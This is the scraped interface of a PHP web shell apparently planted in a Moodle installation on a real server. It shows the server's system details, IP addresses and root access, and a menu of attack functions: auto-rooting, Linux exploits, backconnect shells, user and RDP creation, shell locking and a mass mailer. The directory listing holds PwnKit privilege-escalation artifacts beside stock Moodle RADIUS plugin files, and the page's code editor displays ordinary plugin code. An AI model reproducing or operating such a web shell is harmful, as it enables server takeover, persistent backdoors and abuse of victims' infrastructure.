Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
auth /
radius /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
auth.php
6.27
KB
-rwxrwxrwx
config.html
3.63
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
version.php
1.15
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : auth.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Authentication Plugin: RADIUS Authentication * * Authenticates against a RADIUS server. * Contributed by Clive Gould <clive@ce.bromley.ac.uk> * CHAP support contributed by Stanislav Tsymbalov http://www.tsymbalov.net/ * * @package auth_radius * @author Martin Dougiamas * @license http://www.gnu.org/copyleft/gpl.html GNU Public License */ defined('MOODLE_INTERNAL') || die(); require_once($CFG->libdir.'/authlib.php'); /** * RADIUS authentication plugin. */ class auth_plugin_radius extends auth_plugin_base { /** * Constructor. */ function auth_plugin_radius() { $this->authtype = 'radius'; $this->config = get_config('auth/radius'); } /** * Returns true if the username and password work and false if they are * wrong or don't exist. * * @param string $username The username * @param string $password The password * @return bool Authentication success or failure. */ function user_login ($username, $password) { require_once 'Auth/RADIUS.php'; require_once 'Crypt/CHAP.php'; // Added by Clive on 7th May for test purposes // printf("Username: $username <br/>"); // printf("Password: $password <br/>"); // printf("host: $this->config->host <br/>"); // printf("nasport: $this->config->nasport <br/>"); // printf("secret: $this->config->secret <br/>"); // Added by Stanislav Tsymbalov on 12th March 2008 only for test purposes //$type = 'PAP'; //$type = 'CHAP_MD5'; //$type = 'MSCHAPv1'; //$type = 'MSCHAPv2'; $type = $this->config->radiustype; if (empty($type)) { $type = 'PAP'; } $classname = 'Auth_RADIUS_' . $type; $rauth = new $classname($username, $password); $rauth->addServer($this->config->host, $this->config->nasport, $this->config->secret); $rauth->username = $username; switch($type) { case 'CHAP_MD5': case 'MSCHAPv1': $classname = $type == 'MSCHAPv1' ? 'Crypt_CHAP_MSv1' : 'Crypt_CHAP_MD5'; $crpt = new $classname; $crpt->password = $password; $rauth->challenge = $crpt->challenge; $rauth->chapid = $crpt->chapid; $rauth->response = $crpt->challengeResponse(); $rauth->flags = 1; // If you must use deprecated and weak LAN-Manager-Responses use this: // $rauth->lmResponse = $crpt->lmChallengeResponse(); // $rauth->flags = 0; break; case 'MSCHAPv2': $crpt = new Crypt_CHAP_MSv2; $crpt->username = $username; $crpt->password = $password; $rauth->challenge = $crpt->authChallenge; $rauth->peerChallenge = $crpt->peerChallenge; $rauth->chapid = $crpt->chapid; $rauth->response = $crpt->challengeResponse(); break; default: $rauth->password = $password; break; } if (!$rauth->start()) { printf("Radius start: %s<br/>\n", $rauth->getError()); exit; } $result = $rauth->send(); if ($rauth->isError($result)) { printf("Radius send failed: %s<br/>\n", $result->getMessage()); exit; } else if ($result === true) { // printf("Radius Auth succeeded<br/>\n"); return true; } else { // printf("Radius Auth rejected<br/>\n"); return false; } // get attributes, even if auth failed if (!$rauth->getAttributes()) { printf("Radius getAttributes: %s<br/>\n", $rauth->getError()); } else { $rauth->dumpAttributes(); } $rauth->close(); } function prevent_local_passwords() { return true; } /** * Returns true if this authentication plugin is 'internal'. * * @return bool */ function is_internal() { return false; } /** * Returns true if this authentication plugin can change the user's * password. * * @return bool */ function can_change_password() { return false; } /** * Prints a form for configuring this authentication plugin. * * This function is called from admin/auth.php, and outputs a full page with * a form for configuring this plugin. * * @param array $page An object containing all the data for this page. */ function config_form($config, $err, $user_fields) { global $OUTPUT; include "config.html"; } /** * Processes and stores configuration data for this authentication plugin. */ function process_config($config) { // set to defaults if undefined if (!isset ($config->host)) { $config->host = '127.0.0.1'; } if (!isset ($config->nasport)) { $config->nasport = '1812'; } if (!isset($config->radiustype)) { $config->radiustype = 'PAP'; } if (!isset ($config->secret)) { $config->secret = ''; } if (!isset($config->changepasswordurl)) { $config->changepasswordurl = ''; } // save settings set_config('host', $config->host, 'auth/radius'); set_config('nasport', $config->nasport, 'auth/radius'); set_config('secret', $config->secret, 'auth/radius'); set_config('changepasswordurl', $config->changepasswordurl, 'auth/radius'); set_config('radiustype', $config->radiustype, 'auth/radius'); return true; } }
Close